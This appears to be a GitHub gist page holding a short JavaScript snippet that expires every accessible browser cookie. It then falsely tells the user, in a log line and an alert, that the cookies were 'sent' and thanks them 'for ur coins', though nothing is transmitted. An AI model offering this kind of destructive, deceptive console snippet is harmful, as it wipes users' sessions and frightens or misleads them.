Created
June 1, 2025 17:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.cookie.split(";").forEach(cookie => { | |
const name = cookie.split("=")[0].trim(); | |
document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;'; | |
}); | |
console.log("All accessible cookies deleted and sent, thx broo 🍪💣"); | |
alert("Hi 👋 thx for ur coins"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment